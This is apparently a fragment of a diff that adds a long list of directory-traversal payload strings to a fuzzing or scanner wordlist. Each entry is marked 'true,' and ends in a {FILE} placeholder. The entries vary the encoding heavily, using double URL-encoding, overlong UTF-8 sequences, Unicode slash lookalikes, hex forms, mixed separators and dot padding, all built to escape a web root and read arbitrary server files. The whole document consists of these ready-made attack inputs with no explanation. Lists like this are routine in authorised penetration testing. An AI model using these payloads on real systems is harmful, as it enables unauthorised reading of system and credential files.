+ "true,..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,\\../{FILE}",
+ "true,\\../\\../{FILE}",
+ "true,\\../\\../\\../{FILE}",
+ "true,\\../\\../\\../\\../{FILE}",
+ "true,\\../\\../\\../\\../\\../{FILE}",
+ "true,\\../\\../\\../\\../\\../\\../{FILE}",
+ "true,\\../\\../\\../\\../\\../\\../\\../{FILE}",
+ "true,\\../\\../\\../\\../\\../\\../\\../\\../{FILE}",
+ "true,/..\\{FILE}",
+ "true,/..\\/..\\{FILE}",
+ "true,/..\\/..\\/..\\{FILE}",
+ "true,/..\\/..\\/..\\/..\\{FILE}",
+ "true,/..\\/..\\/..\\/..\\/..\\{FILE}",
+ "true,/..\\/..\\/..\\/..\\/..\\/..\\{FILE}",
+ "true,/..\\/..\\/..\\/..\\/..\\/..\\/..\\{FILE}",
+ "true,/..\\/..\\/..\\/..\\/..\\/..\\/..\\/..\\{FILE}",
+ "true,.../{FILE}",
+ "true,.../.../{FILE}",
+ "true,.../.../.../{FILE}",
+ "true,.../.../.../.../{FILE}",
+ "true,.../.../.../.../.../{FILE}",
+ "true,.../.../.../.../.../.../{FILE}",
+ "true,.../.../.../.../.../.../.../{FILE}",
+ "true,.../.../.../.../.../.../.../.../{FILE}",
+ "true,...\\{FILE}",
+ "true,...\\...\\{FILE}",
+ "true,...\\...\\...\\{FILE}",
+ "true,...\\...\\...\\...\\{FILE}",
+ "true,...\\...\\...\\...\\...\\{FILE}",
+ "true,...\\...\\...\\...\\...\\...\\{FILE}",
+ "true,...\\...\\...\\...\\...\\...\\...\\{FILE}",
+ "true,...\\...\\...\\...\\...\\...\\...\\...\\{FILE}",
+ "true,..../{FILE}",
+ "true,..../..../{FILE}",
+ "true,..../..../..../{FILE}",
+ "true,..../..../..../..../{FILE}",
+ "true,..../..../..../..../..../{FILE}",
+ "true,..../..../..../..../..../..../{FILE}",
+ "true,..../..../..../..../..../..../..../{FILE}",
+ "true,..../..../..../..../..../..../..../..../{FILE}",
+ "true,....\\{FILE}",
+ "true,....\\....\\{FILE}",
+ "true,....\\....\\....\\{FILE}",
+ "true,....\\....\\....\\....\\{FILE}",
+ "true,....\\....\\....\\....\\....\\{FILE}",
+ "true,....\\....\\....\\....\\....\\....\\{FILE}",
+ "true,....\\....\\....\\....\\....\\....\\....\\{FILE}",
+ "true,....\\....\\....\\....\\....\\....\\....\\....\\{FILE}",
+ "true,........................................................................../{FILE}",
+ "true,........................................................................../../{FILE}",
+ "true,........................................................................../../../{FILE}",
+ "true,........................................................................../../../../{FILE}",
+ "true,........................................................................../../../../../{FILE}",
+ "true,........................................................................../../../../../../{FILE}",
+ "true,........................................................................../../../../../../../{FILE}",
+ "true,........................................................................../../../../../../../../{FILE}",
+ "true,..........................................................................\\{FILE}",
+ "true,..........................................................................\\..\\{FILE}",
+ "true,..........................................................................\\..\\..\\{FILE}",
+ "true,..........................................................................\\..\\..\\..\\{FILE}",
+ "true,..........................................................................\\..\\..\\..\\..\\{FILE}",
+ "true,..........................................................................\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..........................................................................\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..........................................................................\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..%u2215{FILE}",
+ "true,..%u2215..%u2215{FILE}",
+ "true,..%u2215..%u2215..%u2215{FILE}",
+ "true,..%u2215..%u2215..%u2215..%u2215{FILE}",
+ "true,..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}",
+ "true,..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}",
+ "true,..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}",
+ "true,..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}",
+ "true,%uff0e%uff0e/{FILE}",
+ "true,%uff0e%uff0e/%uff0e%uff0e/{FILE}",
+ "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
+ "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
+ "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
+ "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
+ "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
+ "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
+ "true,%uff0e%uff0e%u2215{FILE}",
+ "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
+ "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
+ "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
+ "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
+ "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
+ "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
+ "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
+ "true,..%u2216{FILE}",
+ "true,..%u2216..%u2216{FILE}",
+ "true,..%u2216..%u2216..%u2216{FILE}",
+ "true,..%u2216..%u2216..%u2216..%u2216{FILE}",
+ "true,..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}",
+ "true,..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}",
+ "true,..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}",
+ "true,..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}",
+ "true,..%uEFC8{FILE}",
+ "true,..%uEFC8..%uEFC8{FILE}",
+ "true,..%uEFC8..%uEFC8..%uEFC8{FILE}",
+ "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
+ "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
+ "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
+ "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
+ "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
+ "true,..%uF025{FILE}",
+ "true,..%uF025..%uF025{FILE}",
+ "true,..%uF025..%uF025..%uF025{FILE}",
+ "true,..%uF025..%uF025..%uF025..%uF025{FILE}",
+ "true,..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}",
+ "true,..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}",
+ "true,..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}",
+ "true,..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}",
+ "true,%uff0e%uff0e\\{FILE}",
+ "true,%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
+ "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
+ "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
+ "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
+ "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
+ "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
+ "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
+ "true,%uff0e%uff0e%u2216{FILE}",
+ "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
+ "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
+ "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
+ "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
+ "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
+ "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
+ "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
+ "true,..0x2f{FILE}",
+ "true,..0x2f..0x2f{FILE}",
+ "true,..0x2f..0x2f..0x2f{FILE}",
+ "true,..0x2f..0x2f..0x2f..0x2f{FILE}",
+ "true,..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}",
+ "true,..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}",
+ "true,..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}",
+ "true,..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}",
+ "true,0x2e0x2e/{FILE}",
+ "true,0x2e0x2e/0x2e0x2e/{FILE}",
+ "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
+ "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
+ "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
+ "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
+ "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
+ "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
+ "true,0x2e0x2e0x2f{FILE}",
+ "true,0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
+ "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
+ "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
+ "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
+ "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
+ "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
+ "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
+ "true,..0x5c{FILE}",
+ "true,..0x5c..0x5c{FILE}",
+ "true,..0x5c..0x5c..0x5c{FILE}",
+ "true,..0x5c..0x5c..0x5c..0x5c{FILE}",
+ "true,..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}",
+ "true,..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}",
+ "true,..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}",
+ "true,..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}",
+ "true,0x2e0x2e\\{FILE}",
+ "true,0x2e0x2e\\0x2e0x2e\\{FILE}",
+ "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
+ "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
+ "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
+ "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
+ "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
+ "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
+ "true,0x2e0x2e0x5c{FILE}",
+ "true,0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
+ "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
+ "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
+ "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
+ "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
+ "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
+ "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
+ "true,..%c0%2f{FILE}",
+ "true,..%c0%2f..%c0%2f{FILE}",
+ "true,..%c0%2f..%c0%2f..%c0%2f{FILE}",
+ "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
+ "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
+ "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
+ "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
+ "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
+ "true,%c0%2e%c0%2e/{FILE}",
+ "true,%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
+ "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
+ "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
+ "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
+ "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
+ "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
+ "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
+ "true,%c0%2e%c0%2e%c0%2f{FILE}",
+ "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
+ "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
+ "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
+ "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
+ "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
+ "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
+ "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
+ "true,..%c0%5c{FILE}",
+ "true,..%c0%5c..%c0%5c{FILE}",
+ "true,..%c0%5c..%c0%5c..%c0%5c{FILE}",
+ "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
+ "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
+ "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
+ "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
+ "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
+ "true,%c0%2e%c0%2e\\{FILE}",
+ "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
+ "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
+ "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
+ "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
+ "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
+ "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
+ "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
+ "true,%c0%2e%c0%2e%c0%5c{FILE}",
+ "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
+ "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
+ "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
+ "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
+ "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
+ "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
+ "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
+ "true,///%2e%2e%2f{FILE}",
+ "true,///%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,\\\\\\%2e%2e%5c{FILE}",
+ "true,\\\\\\%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,..//{FILE}",
+ "true,..//..//{FILE}",
+ "true,..//..//..//{FILE}",
+ "true,..//..//..//..//{FILE}",
+ "true,..//..//..//..//..//{FILE}",
+ "true,..//..//..//..//..//..//{FILE}",
+ "true,..//..//..//..//..//..//..//{FILE}",
+ "true,..//..//..//..//..//..//..//..//{FILE}",
+ "true,..///{FILE}",
+ "true,..///..///{FILE}",
+ "true,..///..///..///{FILE}",
+ "true,..///..///..///..///{FILE}",
+ "true,..///..///..///..///..///{FILE}",
+ "true,..///..///..///..///..///..///{FILE}",
+ "true,..///..///..///..///..///..///..///{FILE}",
+ "true,..///..///..///..///..///..///..///..///{FILE}",
+ "true,..\\\\{FILE}",
+ "true,..\\\\..\\\\{FILE}",
+ "true,..\\\\..\\\\..\\\\{FILE}",
+ "true,..\\\\..\\\\..\\\\..\\\\{FILE}",
+ "true,..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}",
+ "true,..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}",
+ "true,..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}",
+ "true,..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}",
+ "true,..\\\\\\{FILE}",
+ "true,..\\\\\\..\\\\\\{FILE}",
+ "true,..\\\\\\..\\\\\\..\\\\\\{FILE}",
+ "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
+ "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
+ "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
+ "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
+ "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
+ "true,./\\/./{FILE}",
+ "true,./\\/././\\/./{FILE}",
+ "true,./\\/././\\/././\\/./{FILE}",
+ "true,./\\/././\\/././\\/././\\/./{FILE}",
+ "true,./\\/././\\/././\\/././\\/././\\/./{FILE}",
+ "true,./\\/././\\/././\\/././\\/././\\/././\\/./{FILE}",
+ "true,./\\/././\\/././\\/././\\/././\\/././\\/././\\/./{FILE}",
+ "true,./\\/././\\/././\\/././\\/././\\/././\\/././\\/././\\/./{FILE}",
+ "true,.\\/\\.\\{FILE}",
+ "true,.\\/\\.\\.\\/\\.\\{FILE}",
+ "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
+ "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
+ "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
+ "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
+ "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
+ "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
+ "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}",
+ "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}",
+ "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}",
+ "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}",
+ "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}",
+ "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}",
